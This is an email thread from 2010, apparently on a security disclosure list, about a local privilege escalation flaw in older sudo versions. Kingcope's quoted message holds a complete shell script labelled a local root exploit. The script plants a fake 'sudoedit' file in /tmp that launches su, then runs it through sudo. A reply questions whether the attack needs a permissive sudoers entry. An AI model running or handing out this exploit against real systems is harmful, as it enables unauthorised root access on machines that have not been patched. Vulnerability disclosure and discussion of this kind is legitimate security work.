Hello Andy, I am referring to the following forum posts. http://www.linuxquestions.org/questions/linux-security-4/the-use-of-sudoedit-command-question-785442/ /kcope Am Mittwoch, den 03.03.2010, 12:03 +0000 schrieb andy@xxxxxxxxxxx: > Hi Kingcope, > > ....but if the 'sudoers' file is correctly configured then you would not > have the appropriate sudo permission to run the 'sudoedit' as root. > > ....of course I'm assuming that the 'sudoers' file has not got the 'run > any command' in it. > > If the sudoers file used is even the default then I would think you would > get some error on the lines of: > > 'Sorry, user is not allowed to execute './sudoedit test' as root on this > machine'. > > Aren't you assuming the the sudoers file has a line in it that allows the > user in question to run the /home/myhome/sudoedit as sudo??? > > Or am I missing something? > > Andy > > On Tue, 2 Mar 2010, Kingcope wrote: > > > Just for the record. > > > > ---snip--- > > #!/bin/sh > > # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 > > # local root exploit > > # March 2010 > > # automated by kingcope > > # Full Credits to Slouching > > echo Tod Miller Sudo local root exploit > > echo by Slouching > > echo automated by kingcope > > if [ $# != 1 ] > > then > > echo "usage: ./sudoxpl.sh <file you have permission to edit>" > > exit > > fi > > cd /tmp > > cat > sudoedit << _EOF > > #!/bin/sh > > echo ALEX-ALEX > > su > > /bin/su > > /usr/bin/su > > _EOF > > chmod a+x ./sudoedit > > sudo ./sudoedit $1 > > --snip--- > > > > cheers, > > kingcope > > >
